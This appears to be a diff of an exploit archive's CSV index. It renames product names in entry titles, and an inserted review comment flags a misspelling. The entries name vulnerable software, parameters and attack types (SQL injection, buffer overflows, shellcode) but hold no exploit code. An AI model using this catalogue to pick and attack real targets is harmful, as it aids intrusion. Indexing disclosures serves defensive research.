+11811,platforms/php/webapps/11811.txt,"PHPscripte24 Preisschlacht Liveshop System SQL Injection - (seite&aid) index.php Exploit",2010-03-19,"Easy Laster",php,webapps,0 11813,platforms/php/webapps/11813.txt,"DirectAdmin 1.34.4 - Multiple Cross-Site Request Forgerys",2010-03-19,K053,php,webapps,0 11814,platforms/php/webapps/11814.txt,"Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion",2010-03-19,"Chip d3 bi0s",php,webapps,0 11815,platforms/php/webapps/11815.txt,"Joomla! 
Component Gift Exchange com_giftexchange 1.0 Beta - (pkg) SQL Injection",2010-03-20,"Chip d3 bi0s",php,webapps,0 11816,platforms/php/webapps/11816.txt,"Pay Per Watch & Bid Auktions System - (id_auk) auktion.php Blind SQL Injection",2010-03-20,"Easy Laster",php,webapps,0 11817,platforms/multiple/remote/11817.txt,"KDE 4.4.1 - Ksysguard Remote Code Execution via Cross Application Scripting",2010-03-20,emgent,multiple,remote,0 -11820,platforms/windows/remote/11820.pl,"eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (1)",2010-03-20,corelanc0d3r,windows,remote,0 +11820,platforms/windows/remote/11820.pl,"eDisplay Personal FTP Server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (1)",2010-03-20,corelanc0d3r,windows,remote,0 11822,platforms/hardware/remote/11822.txt,"ZKSoftware Biometric Attendence Managnmnet Hardware[MIPS] 2 - Improper Authentication",2010-03-20,fb1h2s,hardware,remote,0 11823,platforms/cgi/webapps/11823.txt,"Trouble Ticket Software - ttx.cgi Remote File Download",2010-03-20,n01d,cgi,webapps,0 11824,platforms/php/webapps/11824.py,"Woltlab Burning Board Teamsite Hack 3.0 - ts_other.php SQL Injection",2010-03-21,"Easy Laster",php,webapps,0 
@@ -10846,7 +10846,7 @@ id,file,description,date,author,platform,type,port
 11852,platforms/php/webapps/11852.txt,"Xataface - Admin Authentication Bypass",2010-03-23,Xinapse,php,webapps,0
 11853,platforms/php/webapps/11853.txt,"Joomla! Component SMEStorage - Local File Inclusion",2010-03-23,"Chip d3 bi0s",php,webapps,0
 11855,platforms/multiple/dos/11855.c,"Jinais IRC Server 0.1.8 - Null Pointer (PoC)",2010-03-23,"Salvatore Fresta",multiple,dos,0
-11856,platforms/multiple/remote/11856.txt,"uhttp Server - Directory Traversal",2010-03-23,"Salvatore Fresta",multiple,remote,0
+11856,platforms/multiple/remote/11856.txt,"uhttp Server 0.1.0-alpha - Directory Traversal",2010-03-23,"Salvatore Fresta",multiple,remote,0
 11857,platforms/windows/remote/11857.c,"MX Simulator Server - Remote Buffer Overflow (PoC)",2010-03-23,"Salvatore Fresta",windows,remote,0
 11861,platforms/windows/dos/11861.pl,"Smart PC Recorder 4.8 - '.mp3' Local Crash (PoC)",2010-03-24,chap0,windows,dos,0
 11862,platforms/php/webapps/11862.txt,"Easy-Clanpage 2.0 - Blind SQL Injection",2010-03-24,"Easy Laster",php,webapps,0
@@ -10862,7 +10862,7 @@ id,file,description,date,author,platform,type,port
 11874,platforms/php/webapps/11874.txt,"INVOhost - SQL Injection",2010-03-25,"Andrés Gómez",php,webapps,0
 11875,platforms/php/webapps/11875.py,"Easy-Clanpage 2.01 - SQL Injection",2010-03-25,"Easy Laster",php,webapps,0
 11876,platforms/php/webapps/11876.txt,"justVisual 2.0 - 'index.php' Local File Inclusion",2010-03-25,eidelweiss,php,webapps,0
-11877,platforms/windows/remote/11877.py,"eDisplay Personal FTP server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (2)",2010-03-25,sud0,windows,remote,21
+11877,platforms/windows/remote/11877.py,"eDisplay Personal FTP Server 1.0.0 - Multiple Authenticated Stack Buffer Overflow (2)",2010-03-25,sud0,windows,remote,21
 11878,platforms/windows/dos/11878.py,"Cisco TFTP Server 1.1 - Denial of Service",2010-03-25,_SuBz3r0_,windows,dos,69
 11879,platforms/windows/remote/11879.txt,"SAP GUI 7.00 - BExGlobal Active-X unsecure method",2010-03-25,"Alexey Sintsov",windows,remote,0
 11880,platforms/hardware/dos/11880.txt,"Lexmark Multiple Laser printers - Remote Stack Overflow",2010-03-25,"Francis Provencher",hardware,dos,0
@@ -11003,7 +11003,7 @@ id,file,description,date,author,platform,type,port
 12041,platforms/php/webapps/12041.txt,"Solutive CMS - SQL Injection",2010-04-04,"Th3 RDX",php,webapps,0
 12042,platforms/php/webapps/12042.txt,"x10 mirco blogging 121 - SQL Injection",2010-04-04,ITSecTeam,php,webapps,0
 12043,platforms/php/webapps/12043.html,"Prediction League 0.3.8 - Cross-Site Request Forgery (Add Admin)",2010-04-04,indoushka,php,webapps,0
-12044,platforms/windows/remote/12044.c,"Easy Ftp Server 1.7.0.2 - MKD Remote Authenticated Buffer Overflow",2010-04-04,x90c,windows,remote,0
+12044,platforms/windows/remote/12044.c,"EasyFTP Server 1.7.0.2 - MKD Remote Authenticated Buffer Overflow",2010-04-04,x90c,windows,remote,0
 12045,platforms/php/webapps/12045.html,"MunkyScripts Simple Gallery - SQL Injection",2010-04-04,ITSecTeam,php,webapps,0
 12047,platforms/php/webapps/12047.html,"nodesforum 1.033 - Remote File Inclusion",2010-04-04,ITSecTeam,php,webapps,0
 12048,platforms/php/webapps/12048.html,"ttCMS 5.0 - Remote File Inclusion",2010-04-04,ITSecTeam,php,webapps,0
@@ -11372,7 +11372,7 @@ id,file,description,date,author,platform,type,port
 12454,platforms/php/webapps/12454.txt,"Zyke CMS 1.0 - Arbitrary File Upload",2010-04-29,indoushka,php,webapps,0
 12455,platforms/php/webapps/12455.txt,"Ucenter Projekt 2.0 - Insecure crossdomain (Cross-Site Scripting)",2010-04-29,indoushka,php,webapps,0
 12456,platforms/php/webapps/12456.txt,"chCounter - indirect SQL Injection / Cross-Site Scripting",2010-04-29,Valentin,php,webapps,0
-12457,platforms/windows/dos/12457.txt,"Apple Safari 4.0.3 (Windows x86) - (Windows x86) CSS Remote Denial of Service",2010-04-29,ITSecTeam,windows,dos,0
+12457,platforms/windows/dos/12457.txt,"Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service",2010-04-29,ITSecTeam,windows,dos,0
 12458,platforms/php/webapps/12458.txt,"Scratcher - (SQL Injection / Cross-Site Scripting) Multiple Remote",2010-04-29,"cr4wl3r ",php,webapps,0
 12459,platforms/php/webapps/12459.txt,"ec21 clone 3.0 - 'id' SQL Injection",2010-04-30,v3n0m,php,webapps,0
 12460,platforms/php/webapps/12460.txt,"B2B Gold Script - 'id' SQL Injection",2010-04-30,v3n0m,php,webapps,0
@@ -11505,8 +11505,8 @@ id,file,description,date,author,platform,type,port
 14364,platforms/php/webapps/14364.html,"eXtreme Message Board 1.9.11 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-15,10n1z3d,php,webapps,0
 12601,platforms/php/webapps/12601.txt,"Joomla! Component JE Job - Local File Inclusion",2010-05-14,Valentin,php,webapps,0
 12602,platforms/windows/dos/12602.txt,"Mozilla Firefox 3.6.3 / Safari 4.0.5 - Access Violation Exception and Unknown Exception",2010-05-14,"Fredrik Nordberg Almroth",windows,dos,0
-12603,platforms/windows/dos/12603.py,"SmallFTPd FTP Server 1.0.3 - DELE Command Denial of Service",2010-05-14,"Jeremiah Talamantes",windows,dos,0
-12604,platforms/windows/dos/12604.py,"TYPSoft FTP Server 1.10 - RETR Command Denial of Service",2010-05-14,"Jeremiah Talamantes",windows,dos,0
+12603,platforms/windows/dos/12603.py,"SmallFTPd 1.0.3 - DELE Command Denial of Service",2010-05-14,"Jeremiah Talamantes",windows,dos,0
+12604,platforms/windows/dos/12604.py,"TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service",2010-05-14,"Jeremiah Talamantes",windows,dos,0
 12605,platforms/windows/dos/12605.html,"IncrediMail - 'ImShExtU.dll' ActiveX Memory Corruption",2010-05-14,Lincoln,windows,dos,0
 12606,platforms/asp/webapps/12606.txt,"SelfComposer CMS - SQL Injection",2010-05-14,Locu,asp,webapps,0
 12607,platforms/php/webapps/12607.txt,"Joomla! Component com_jequoteform - Local File Inclusion",2010-05-14,"ALTBTA ",php,webapps,0
@@ -11580,7 +11580,7 @@ id,file,description,date,author,platform,type,port
 28128,platforms/php/webapps/28128.txt,"CMS Mini 0.2.2 - Multiple Vulnerabilities",2013-09-06,SANTHO,php,webapps,80
 12679,platforms/windows/webapps/12679.txt,"3Com* iMC (Intelligent Management Center) - Unauthenticated File Retrieval (Traversal)",2010-05-21,"Richard Brain",windows,webapps,0
 12680,platforms/windows/webapps/12680.txt,"3Com* iMC (Intelligent Management Center) - Cross-Site Scripting / Information Disclosure Flaws",2010-05-21,"Richard Brain",windows,webapps,0
-12683,platforms/windows/dos/12683.pl,"SolarWinds 10.4.0.10 - TFTP Denial of Service",2010-05-21,Nullthreat,windows,dos,69
+12683,platforms/windows/dos/12683.pl,"SolarWinds TFTP Server 10.4.0.10 - Denial of Service",2010-05-21,Nullthreat,windows,dos,69
 12684,platforms/php/webapps/12684.txt,"ConPresso 4.0.7 - SQL Injection",2010-05-21,Gamoscu,php,webapps,0
 12686,platforms/php/webapps/12686.txt,"Online University - (Authentication Bypass) SQL Injection",2010-05-21,"cr4wl3r ",php,webapps,0
 12687,platforms/windows/dos/12687.pl,"WinDirectAudio 1.0 - '.wav' (PoC)",2010-05-21,ahwak2000,windows,dos,0
@@ -11610,7 +11610,7 @@ id,file,description,date,author,platform,type,port
 12712,platforms/php/webapps/12712.txt,"goffgrafix - Design's - SQL Injection",2010-05-23,XroGuE,php,webapps,0
 12713,platforms/php/webapps/12713.txt,"eCreo - SQL Injection",2010-05-23,cyberlog,php,webapps,0
 12714,platforms/php/webapps/12714.txt,"infoware - SQL Injection",2010-05-24,cyberlog,php,webapps,0
-12715,platforms/multiple/webapps/12715.pl,"e107 - Code Exec",2010-05-24,McFly,multiple,webapps,0
+12715,platforms/multiple/webapps/12715.pl,"e107 - Code Exection",2010-05-24,McFly,multiple,webapps,0
 12716,platforms/php/webapps/12716.txt,"runt-communications Design - 'property_more.php' SQL Injection",2010-05-24,CoBRa_21,php,webapps,0
 12717,platforms/php/webapps/12717.txt,"Telia Web Design - 'index.php' SQL Injection",2010-05-24,CoBRa_21,php,webapps,0
 12718,platforms/php/webapps/12718.txt,"BBMedia Design's - 'news_more.php' SQL Injection",2010-05-24,gendenk,php,webapps,0
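Review bot: The new title for entry 12715 misspells the vulnerability class: `"e107 - Code Exection"` should read `"e107 - Code Execution"`. The old value `Code Exec` was at least a prefix of the intended term, whereas the misspelt form will not match a keyword lookup for "Code Execution". That matters to anyone checking whether a public entry exists for an e107 installation they maintain, presumably by searching this index. Suggested added line: `12715,platforms/multiple/webapps/12715.pl,"e107 - Code Execution",2010-05-24,McFly,multiple,webapps,0`.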
@@ -11658,7 +11658,7 @@ id,file,description,date,author,platform,type,port
 12771,platforms/php/webapps/12771.txt,"Toronja CMS - HTML / Cross-Site Scripting Injection",2010-05-27,CoBRa_21,php,webapps,0
 12772,platforms/php/webapps/12772.txt,"Realtor WebSite System E-Commerce - SQL Injection",2010-05-27,cyberlog,php,webapps,0
 12773,platforms/php/webapps/12773.txt,"Realtor Real Estate Agent - (idproperty) SQL Injection",2010-05-28,v3n0m,php,webapps,0
-12774,platforms/windows/dos/12774.py,"HomeFTP Server r1.10.3 (build 144) - Denial of Service",2010-05-28,Dr_IDE,windows,dos,0
+12774,platforms/windows/dos/12774.py,"Home FTP Server r1.10.3 (build 144) - Denial of Service",2010-05-28,Dr_IDE,windows,dos,0
 12775,platforms/multiple/dos/12775.py,"VideoLAN VLC Media Player 1.0.6 - '.avi' Media File Crash (PoC)",2010-05-28,Dr_IDE,multiple,dos,0
 12776,platforms/php/webapps/12776.txt,"Realtor WebSite System E-Commerce - idfestival SQL Injection",2010-05-28,CoBRa_21,php,webapps,0
 12777,platforms/php/webapps/12777.txt,"Realtor Real Estate Agent - 'news.php' SQL Injection",2010-05-28,v3n0m,php,webapps,0
@@ -11991,7 +11991,7 @@ id,file,description,date,author,platform,type,port
 13503,platforms/unixware/shellcode/13503.txt,"UnixWare - execve /bin/sh Shellcode (95 bytes)",2004-09-26,K2,unixware,shellcode,0
 13504,platforms/win_x86/shellcode/13504.asm,"Windows 5.0 < 7.0 x86 - Null Free bindshell port 28876 Shellcode",2009-07-27,Skylined,win_x86,shellcode,0
 13505,platforms/win_x86/shellcode/13505.c,"Win32/XP SP2 (EN) - cmd.exe Shellcode (23 bytes)",2009-07-17,Stack,win_x86,shellcode,0
-18615,platforms/windows/dos/18615.py,"TYPSoft FTP Server 1.1 - Remote Denial of Service (APPE)",2012-03-17,"brock haun",windows,dos,0
+18615,platforms/windows/dos/18615.py,"TYPSoft FTP Server 1.1 - 'APPE' Remote Denial of Service",2012-03-17,"brock haun",windows,dos,0
 18593,platforms/php/webapps/18593.txt,"ModX 2.2.0 - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0
 18594,platforms/php/webapps/18594.txt,"Simple Posting System - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0
 13507,platforms/win_x86/shellcode/13507.txt,"Win32 - SEH omelet Shellcode",2009-03-16,Skylined,win_x86,shellcode,0
@@ -12199,7 +12199,7 @@ id,file,description,date,author,platform,type,port
 13833,platforms/php/webapps/13833.txt,"Parallels System Automation (PSA) - Local File Inclusion",2010-06-11,"Pouya Daneshmand",php,webapps,0
 13834,platforms/windows/remote/13834.html,"Sygate Personal Firewall 5.6 build 2808 - ActiveX with DEP Bypass",2010-06-11,Lincoln,windows,remote,0
 13835,platforms/php/webapps/13835.txt,"DaLogin 2.2 - 'FCKeditor' Arbitrary File Upload",2010-06-11,eidelweiss,php,webapps,0
-13836,platforms/windows/dos/13836.py,"SolarWinds 10.4.0.13 - Denial of Service",2010-06-12,Nullthreat,windows,dos,0
+13836,platforms/windows/dos/13836.py,"SolarWinds TFTP Server 10.4.0.13 - Denial of Service",2010-06-12,Nullthreat,windows,dos,0
 13837,platforms/windows/dos/13837.pl,"Media Player Classic 1.3.1774.0 - (mpcpl) Local Denial of Service (PoC)",2010-06-12,R3d-D3V!L,windows,dos,0
 13838,platforms/windows/dos/13838.pl,"CP3 Studio PC Version - Denial of Service",2010-06-12,chap0,windows,dos,0
 13840,platforms/asp/webapps/13840.txt,"VU Case Manager - Authentication Bypass",2010-06-12,"L0rd CrusAd3r",asp,webapps,0
@@ -12480,7 +12480,7 @@ id,file,description,date,author,platform,type,port
 14182,platforms/windows/remote/14182.py,"HP OpenView NNM - getnnmdata.exe CGI Invalid Hostname Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80
 14192,platforms/asp/webapps/14192.txt,"Ziggurat Farsi CMS - SQL Injection",2010-07-03,"Arash Saadatfar",asp,webapps,0
 14184,platforms/php/webapps/14184.txt,"SweetRice < 0.6.4 - 'FCKeditor' Arbitrary File Upload",2010-07-03,ITSecTeam,php,webapps,0
-14185,platforms/multiple/dos/14185.py,"ISC-DHCPD - Denial of Service",2010-07-03,sid,multiple,dos,0
+14185,platforms/multiple/dos/14185.py,"ISC DHCPD - Denial of Service",2010-07-03,sid,multiple,dos,0
 14191,platforms/windows/local/14191.pl,"ASX to MP3 Converter 3.1.2.1 - Local Buffer Overflow (SEH)",2010-07-03,Madjix,windows,local,0
 14186,platforms/php/webapps/14186.txt,"Family Connections Who is Chatting AddOn - Remote File Inclusion",2010-07-03,lumut--,php,webapps,0
 14187,platforms/php/webapps/14187.txt,"Joomla! Component eventcal 1.6.4 com_eventcal - Blind SQL Injection",2010-07-03,RoAd_KiLlEr,php,webapps,0
@@ -12653,10 +12653,10 @@ id,file,description,date,author,platform,type,port
 14397,platforms/windows/local/14397.rb,"MoreAmp - Buffer Overflow (SEH) (Metasploit)",2010-07-17,Madjix,windows,local,0
 14404,platforms/php/webapps/14404.txt,"Kayako eSupport 3.70.02 - 'functions.php' SQL Injection",2010-07-18,ScOrPiOn,php,webapps,0
 14405,platforms/php/webapps/14405.txt,"PHP-Fusion - Remote Command Execution",2010-07-18,"ViRuS Qalaa",php,webapps,0
-14399,platforms/windows/remote/14399.py,"Easy FTP Server 1.7.0.11 - Authenticated 'MKD' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0
-14400,platforms/windows/remote/14400.py,"Easy FTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0
+14399,platforms/windows/remote/14399.py,"EasyFTP Server 1.7.0.11 - Authenticated 'MKD' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0
+14400,platforms/windows/remote/14400.py,"EasyFTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0
 14401,platforms/asp/webapps/14401.txt,"ClickAndRank Script - Authentication Bypass",2010-07-18,walid,asp,webapps,0
-14402,platforms/windows/remote/14402.py,"Easy FTP Server 1.7.0.11 - Authenticated 'CWD' Command Remote Buffer Overflow",2010-07-18,fdiskyou,windows,remote,0
+14402,platforms/windows/remote/14402.py,"EasyFTP Server 1.7.0.11 - Authenticated 'CWD' Command Remote Buffer Overflow",2010-07-18,fdiskyou,windows,remote,0
 14403,platforms/windows/local/14403.txt,"Microsoft Windows - Automatic LNK Shortcut File Code Execution",2010-07-18,Ivanlef0u,windows,local,0
 14406,platforms/bsd/local/14406.pl,"Ghostscript - '.PostScript' File Stack Overflow",2010-07-18,"Rodrigo Rubira Branco",bsd,local,0
 14407,platforms/aix/remote/14407.c,"rpc.pcnfsd - Remote Format String",2010-07-18,"Rodrigo Rubira Branco",aix,remote,0
@@ -12696,7 +12696,7 @@ id,file,description,date,author,platform,type,port
 14448,platforms/php/webapps/14448.txt,"Joomla! Component com_golfcourseguide) 0.9.6.0 (Beta) / 1 (Beta - SQL Injection",2010-07-23,Valentin,php,webapps,0
 14449,platforms/php/webapps/14449.txt,"Joomla! Component com_huruhelpdesk - SQL Injection",2010-07-23,Amine_92,php,webapps,0
 14450,platforms/php/webapps/14450.txt,"Joomla! Component com_iproperty - SQL Injection",2010-07-23,Amine_92,php,webapps,0
-14451,platforms/windows/remote/14451.rb,"Easy FTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow (Metasploit)",2010-07-23,"Muhamad Fadzil Ramli",windows,remote,0
+14451,platforms/windows/remote/14451.rb,"EasyFTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow (Metasploit)",2010-07-23,"Muhamad Fadzil Ramli",windows,remote,0
 14452,platforms/linux/dos/14452.txt,"FTP Client 0.17-19build1 ACCT (Ubuntu 10.04) - Buffer Overflow",2010-07-23,d0lc3,linux,dos,0
 14453,platforms/php/webapps/14453.txt,"PhotoPost PHP 4.6.5 - (ecard.php) SQL Injection",2010-07-23,CoBRa_21,php,webapps,0
 14454,platforms/php/webapps/14454.txt,"ValidForm Builder script - Remote Command Execution",2010-07-23,"HaCkEr arar",php,webapps,0
@@ -12822,7 +12822,7 @@ id,file,description,date,author,platform,type,port
 14620,platforms/windows/dos/14620.py,"RightMark Audio Analyzer 6.2.3 - Denial of Service",2010-08-11,"Oh Yaw Theng",windows,dos,0
 14621,platforms/windows/dos/14621.py,"Abac Karaoke 2.15 - Denial of Service",2010-08-11,"Oh Yaw Theng",windows,dos,0
 14622,platforms/php/webapps/14622.txt,"KnowledgeTree 3.5.2 Community Edition - Permanent Cross-Site Scripting",2010-08-11,fdiskyou,php,webapps,0
-14623,platforms/windows/remote/14623.py,"Easy FTP Server 1.7.0.11 - Authenticated Multiple Commands Remote Buffer Overflow",2010-08-11,"Glafkos Charalambous ",windows,remote,21
+14623,platforms/windows/remote/14623.py,"EasyFTP Server 1.7.0.11 - Authenticated Multiple Commands Remote Buffer Overflow",2010-08-11,"Glafkos Charalambous ",windows,remote,21
 14624,platforms/windows/dos/14624.py,"JaMP Player 4.2.2.0 - Denial of Service",2010-08-12,"Oh Yaw Theng",windows,dos,0
 14625,platforms/windows/dos/14625.py,"CombiWave Lite 4.0.1.4 - Denial of Service",2010-08-12,"Oh Yaw Theng",windows,dos,0
 14628,platforms/win_x86/webapps/14628.txt,"PHP-Nuke 8.1 SEO Arabic - Remote File Inclusion",2010-08-12,LoSt.HaCkEr,win_x86,webapps,80
@@ -12939,7 +12939,7 @@ id,file,description,date,author,platform,type,port
 14773,platforms/windows/local/14773.c,"Adobe Illustrator CS4 - 'aires.dll' DLL Hijacking Exploit",2010-08-25,"Glafkos Charalambous ",windows,local,0
 14774,platforms/windows/local/14774.c,"Cisco Packet Tracer 5.2 - (wintab32.dll) DLL Hijacking Exploit",2010-08-25,CCNA,windows,local,0
 14775,platforms/windows/local/14775.c,"Adobe InDesign CS4 - 'ibfs32.dll' DLL Hijacking Exploit",2010-08-25,"Glafkos Charalambous ",windows,local,0
-14779,platforms/windows/remote/14779.pl,"deepin tftp server 1.25 - Directory Traversal",2010-08-25,demonalex,windows,remote,0
+14779,platforms/windows/remote/14779.pl,"Deepin TFTP Server 1.25 - Directory Traversal",2010-08-25,demonalex,windows,remote,0
 14778,platforms/windows/local/14778.c,"Microsoft Windows Contacts - 'wab32res.dll' DLL Hijacking Exploit",2010-08-25,storm,windows,local,0
 14780,platforms/windows/local/14780.c,"Microsoft Windows Internet Communication Settings - 'schannel.dll' DLL Hijacking Exploit",2010-08-25,ALPdaemon,windows,local,0
 14781,platforms/windows/local/14781.c,"Roxio MyDVD 9 - 'HomeUtils9.dll' DLL Hijacking Exploit",2010-08-25,storm,windows,local,0
@@ -12994,7 +12994,7 @@ id,file,description,date,author,platform,type,port
 14854,platforms/php/webapps/14854.py,"Cpanel PHP - Restriction Bypass",2010-09-01,Abysssec,php,webapps,0
 14851,platforms/php/webapps/14851.txt,"dompdf 0.6.0 beta1 - Remote File Inclusion",2010-09-01,Andre_Corleone,php,webapps,0
 14852,platforms/windows/dos/14852.txt,"LeadTools ActiveX common dialogs 16.5 - Multiple Vulnerabilities",2010-09-01,LiquidWorm,windows,dos,0
-14853,platforms/windows/remote/14853.py,"Adobe Acrobat Reader and Flash Player - 'newclass' invalid pointer",2010-09-01,Abysssec,windows,remote,0
+14853,platforms/windows/remote/14853.py,"Adobe Acrobat Reader and Flash Player - 'newclass' Invalid Pointer Exploit",2010-09-01,Abysssec,windows,remote,0
 14870,platforms/asp/webapps/14870.txt,"rainbowportal - Multiple Vulnerabilities",2010-09-02,Abysssec,asp,webapps,0
 14856,platforms/windows/remote/14856.txt,"TFTPDWIN 0.4.2 - Directory Traversal",2010-09-01,chr1x,windows,remote,0
 14857,platforms/windows/remote/14857.txt,"tftp desktop 2.5 - Directory Traversal",2010-09-01,chr1x,windows,remote,0
@@ -13256,7 +13256,7 @@ id,file,description,date,author,platform,type,port
 15593,platforms/php/webapps/15593.html,"Cpanel 11.x - Cross-Site Request Forgery (Edit E-mail)",2010-11-21,"Mon7rF .",php,webapps,0
 15594,platforms/php/webapps/15594.txt,"AuraCMS - 'pfd.php' SQL Injection",2010-11-22,"Don Tukulesto",php,webapps,0
 15595,platforms/php/webapps/15595.txt,"jSchool Advanced - Blind SQL Injection",2010-11-22,"Don Tukulesto",php,webapps,0
-15596,platforms/jsp/webapps/15596.txt,"JCMS 2010 - file download",2010-11-22,Beach,jsp,webapps,0
+15596,platforms/jsp/webapps/15596.txt,"JCMS 2010 - File Download Exploit",2010-11-22,Beach,jsp,webapps,0
 15597,platforms/asp/webapps/15597.txt,"Acidcat CMS 3.3 - 'FCKeditor' Arbitrary File Upload",2010-11-22,Net.Edit0r,asp,webapps,0
 15598,platforms/windows/dos/15598.pl,"Xion Audio Player 1.0.126 - '.m3u8' Buffer Overflow",2010-11-23,anT!-Tr0J4n,windows,dos,0
 15599,platforms/windows/local/15599.py,"Xion Audio Player 1.0.127 - '.m3u' Buffer Overflow",2010-11-23,0v3r,windows,local,0
@@ -13683,7 +13683,7 @@ id,file,description,date,author,platform,type,port
 15747,platforms/windows/local/15747.py,"Aesop GIF Creator 2.1 - '.aep' Buffer Overflow",2010-12-16,xsploitedsec,windows,local,0
 15748,platforms/php/webapps/15748.txt,"QualDev eCommerce script - SQL Injection",2010-12-16,ErrNick,php,webapps,0
 15749,platforms/php/webapps/15749.txt,"Joomla! Component JRadio (com_jradio) - Local File Inclusion",2010-12-16,Sid3^effects,php,webapps,0
-15750,platforms/windows/dos/15750.py,"SolarFTP 2.0 - Multiple Commands Denial of Service",2010-12-16,modpr0be,windows,dos,0
+15750,platforms/windows/dos/15750.py,"Solar FTP Server 2.0 - Multiple Commands Denial of Service",2010-12-16,modpr0be,windows,dos,0
 15751,platforms/windows/local/15751.pl,"Altarsoft Audio Converter 1.1 - Buffer Overflow (SEH)",2010-12-16,"C4SS!0 G0M3S",windows,local,0
 15752,platforms/php/webapps/15752.txt,"Softbiz PHP Joke Site Software - Multiple SQL Injections",2010-12-17,v3n0m,php,webapps,0
 15753,platforms/hardware/webapps/15753.html,"D-Link DIR-300 - Cross-Site Request Forgery (Change Admin Account Settings)",2010-12-17,outlaw.dll,hardware,webapps,0
@@ -13779,7 +13779,7 @@ id,file,description,date,author,platform,type,port
 15855,platforms/windows/local/15855.py,"Digital Music Pad 8.2.3.4.8 - '.pls' SEH Overflow",2010-12-29,"Abhishek Lyall",windows,local,0
 15857,platforms/php/webapps/15857.txt,"Discovery TorrentTrader 2.6 - Multiple Vulnerabilities",2010-12-29,EsS4ndre,php,webapps,0
 15858,platforms/php/webapps/15858.txt,"WordPress 3.0.3 - Persistent Cross-Site Scripting (Internet Explorer 6/7 NS8.1)",2010-12-29,Saif,php,webapps,0
-15860,platforms/windows/dos/15860.py,"TYPSoft FTP Server 1.10 - RETR CMD Denial of Service",2010-12-29,emgent,windows,dos,0
+15860,platforms/windows/dos/15860.py,"TYPSoft FTP Server 1.10 - 'RETR' Command Denial of Service",2010-12-29,emgent,windows,dos,0
 15861,platforms/windows/remote/15861.txt,"httpdasm 0.92 - Directory Traversal",2010-12-29,"John Leitch",windows,remote,0
 15862,platforms/windows/remote/15862.txt,"quickphp Web server 1.9.1 - Directory Traversal",2010-12-29,"John Leitch",windows,remote,0
 15863,platforms/php/webapps/15863.txt,"lightneasy 3.2.2 - Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",php,webapps,0
@@ -13807,7 +13807,7 @@ id,file,description,date,author,platform,type,port
 15898,platforms/multiple/dos/15898.py,"Wireshark - ENTTEC DMX Data RLE Buffer Overflow",2011-01-03,"non-customers crew",multiple,dos,0
 15902,platforms/php/webapps/15902.html,"S40 CMS 0.4.1 - Cross-Site Request Forgery (Change Admin Password)",2011-01-04,pentesters.ir,php,webapps,0
 15901,platforms/windows/local/15901.py,"Music Animation Machine MIDI Player - Buffer Overflow (SEH)",2011-01-04,Acidgen,windows,local,0
-15905,platforms/windows/dos/15905.py,"Xynph 1.0 - USER Denial of Service",2011-01-04,freak_out,windows,dos,0
+15905,platforms/windows/dos/15905.py,"Xynph FTP Server 1.0 - USER Denial of Service",2011-01-04,freak_out,windows,dos,0
 15991,platforms/windows/remote/15991.html,"Real Networks RealPlayer SP - 'RecordClip' Method Remote Code Execution",2011-01-14,"Sean de Regge",windows,remote,0
 15907,platforms/php/webapps/15907.txt,"Nucleus 3.61 - Multiple Remote File Inclusion",2011-01-05,n0n0x,php,webapps,0
 15913,platforms/php/webapps/15913.pl,"PhpGedView 4.2.3 - Local File Inclusion",2011-01-05,dun,php,webapps,0
@@ -13991,7 +13991,7 @@ id,file,description,date,author,platform,type,port
 16166,platforms/windows/dos/16166.py,"Microsoft Windows 2003 - AD Unauthenticated BROWSER ELECTION Remote Heap Overflow",2011-02-14,Cupidon-3005,windows,dos,0
 16148,platforms/php/webapps/16148.txt,"SourceBans 1.4.7 - Cross-Site Scripting",2011-02-09,Sw1tCh,php,webapps,0
 16149,platforms/hardware/remote/16149.txt,"Linksys WAP610N - Unauthenticated Root Access Security",2011-02-10,"Matteo Ignaccolo",hardware,remote,0
-16150,platforms/windows/dos/16150.py,"XM Easy Personal FTP Server 5.8.0 - (TYPE) Denial of Service",2011-02-10,"Houssam Sahli",windows,dos,0
+16150,platforms/windows/dos/16150.py,"XM Easy Personal FTP Server 5.8.0 - 'TYPE' Denial of Service",2011-02-10,"Houssam Sahli",windows,dos,0
 16152,platforms/multiple/webapps/16152.py,"LocatePC 1.05 (Ligatt Version + Others) - SQL Injection",2011-02-10,anonymous,multiple,webapps,0
 16153,platforms/windows/local/16153.py,"MoviePlay 4.82 - '.lst' Buffer Overflow",2011-02-11,sickness,windows,local,0
 16154,platforms/php/webapps/16154.txt,"Horde - Horde_Image::factory driver Argument Local File Inclusion",2011-02-11,skysbsb,php,webapps,0
@@ -14016,7 +14016,7 @@ id,file,description,date,author,platform,type,port
 16181,platforms/php/webapps/16181.txt,"WordPress Plugin User Photo Component - Arbitrary File Upload",2011-02-17,ADVtools,php,webapps,0
 16182,platforms/linux/dos/16182.txt,"PHP 5.3.5 - grapheme_extract() Null Pointer Dereference",2011-02-17,"Maksymilian Arciemowicz",linux,dos,0
 16193,platforms/windows/dos/16193.pl,"Avira AntiVir QUA file - (avcenter.exe) Local Crash (PoC)",2011-02-19,KedAns-Dz,windows,dos,0
-16204,platforms/windows/dos/16204.pl,"Solar FTP 2.1 - Denial of Service",2011-02-22,x000,windows,dos,0
+16204,platforms/windows/dos/16204.pl,"Solar FTP Server 2.1 - Denial of Service",2011-02-22,x000,windows,dos,0
 16190,platforms/windows/dos/16190.pl,"IBM Lotus Domino LDAP - Bind Request Remote Code Execution",2011-02-18,"Francis Provencher",windows,dos,0
